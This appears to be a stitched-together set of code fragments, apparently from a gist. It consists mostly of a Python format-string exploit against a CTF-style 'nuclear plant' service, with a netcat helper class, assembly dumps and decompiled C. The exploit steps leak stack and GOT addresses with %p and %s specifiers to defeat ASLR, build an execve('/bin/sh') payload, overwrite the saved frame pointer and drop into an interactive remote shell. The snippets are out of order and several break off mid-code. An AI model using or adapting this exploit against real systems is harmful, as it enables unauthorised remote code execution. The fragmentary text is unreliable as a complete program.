function validate() { | |
var x = document.forms["formxx"]["pwz"].value; | |
alert(x); | |
if (x == null || x == "") { | |
alert("Password must be filled out"); | |
return false; | |
} | |
if (!x.match(/^[A-Za-z]+$/)) { | |
alert("Bad charset"); |
# -------------- netcatlib.py ----------------------------------- | |
import socket | |
class Netcat: | |
# TODO: ip and port should be optionaly, and an open() method should be added | |
# TODO: specify a timeout argument as well? | |
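def __init__(self, ip, port, timeout=None):
    """Open a TCP connection to ``ip``:``port``.

    Args:
        ip: host to connect to; handed straight to ``socket.connect``.
        port: TCP port number.
        timeout: optional number of seconds to wait for the connect and
            for every later operation on the socket. ``None`` (the
            default) keeps the original fully blocking behaviour, so
            existing callers are unaffected.

    Raises:
        socket.error: if the connection cannot be established. The
            socket is closed before the error propagates so a failed
            construction does not leak a descriptor.
    """
    # Presumably the receive buffer used by the read helpers defined
    # further down in the class (not visible here) -- kept as a str.
    self.buff = ""
    self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Without a timeout a connect to a silent host blocks indefinitely;
    # settimeout also applies to later send/recv calls on this socket.
    if timeout is not None:
        self.soc.settimeout(timeout)
    try:
        self.soc.connect((ip, port))
    except socket.error:
        self.soc.close()
        raise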
call 0x80486d0 <printf@plt> | |
movl $0x8049f3a,(%esp) | |
call 0x8048750 <puts@plt> | |
mov -0xc(%ebp),%eax | |
leave ; equivalent to movl %ebp, %esp | |
; popl %ebp | |
ret |
; Dump of assembler code for function printf: | |
push %ebp ; save old frame pointer | |
mov %esp,%ebp | |
push %ebx | |
call 0xb7e8ba0f | |
add $0x10dd5b,%ebx | |
sub $0xc,%esp | |
lea 0xc(%ebp),%eax | |
mov %eax,0x8(%esp) | |
mov 0x8(%ebp),%eax |
# Step 4 --- Test whether we've got our shell and let the magic happen | |
nc.write("echo \"GOT A SHELL\"\n") | |
nc.read_until("GOT A SHELL\n") | |
print "\nSUCCESS! We have a shell!\n" | |
while True: | |
command = raw_input("$ ") | |
nc.write(command + "\n") | |
# quick and dirty way to detect end of output |
# Step 3 --- Exploit: trigger the payload so we get a nice shell | |
# minus 4 because leave does "mov %ebp, %esp" and then "pop %ebp" | |
target_ebp_value = location_payload - 4 | |
ebp_ho_count = ((target_ebp_value >> 16) % 0x10000) | |
ebp_lo_count = (target_ebp_value % 0x10000) | |
EXPLOIT = dword_to_bitstring(location_ebp_printf + 2) | |
EXPLOIT += dword_to_bitstring(location_ebp_printf) | |
if ebp_ho_count < ebp_lo_count: |
# Step 2 --- Payload: place the constructed stack which we will execute subsequently | |
PAYLOAD = dword_to_bitstring(addrexecve) # address of execve | |
PAYLOAD += "AAAA" # fake return addr | |
PAYLOAD += dword_to_bitstring(location_payload + 20) # ptr to /bin/sh | |
PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to argv | |
PAYLOAD += dword_to_bitstring(location_payload + 28) # ptr to envp | |
PAYLOAD += "/bin/sh" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") |
# Step 1c--- Get the address of execve | |
LEAKFORKADDR = dword_to_bitstring(location_got_fork) | |
LEAKFORKADDR += "%22$s:ENFORK:" | |
nc.read_until("Your choice: ") | |
nc.write("1" + "\n") | |
nc.read_until("Insert name: ") | |
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n") | |
nc.read_until("Uranium in nuclear plant \"") |
import netcatlib | |
# Step 0 --- Connect to the target | |
nc = netcatlib.Netcat("localhost", 4444) | |
print "[+] Connected" | |
# Step 1a --- Defeating ASLR with information leakage: location of stack | |
INFOLEAK = "%10$p:ENDEBP:%11$p:ENDRET:" | |
nc.read_until("Your choice: ") |
int __cdecl handle_plant_creation(int a1) | |
{ | |
puts("Creating new plant.."); | |
plantid = *(_DWORD *)(a1 + 5600); | |
plant_info = (char *)(a1 + 112 * plantid); | |
memset(plant_info, 0, 112); | |
ask_for_string((int)"Insert name: ", &entered_plant_name, 0x70u); | |
*((_WORD *)plant_info + 55) = plantid; | |
[..] |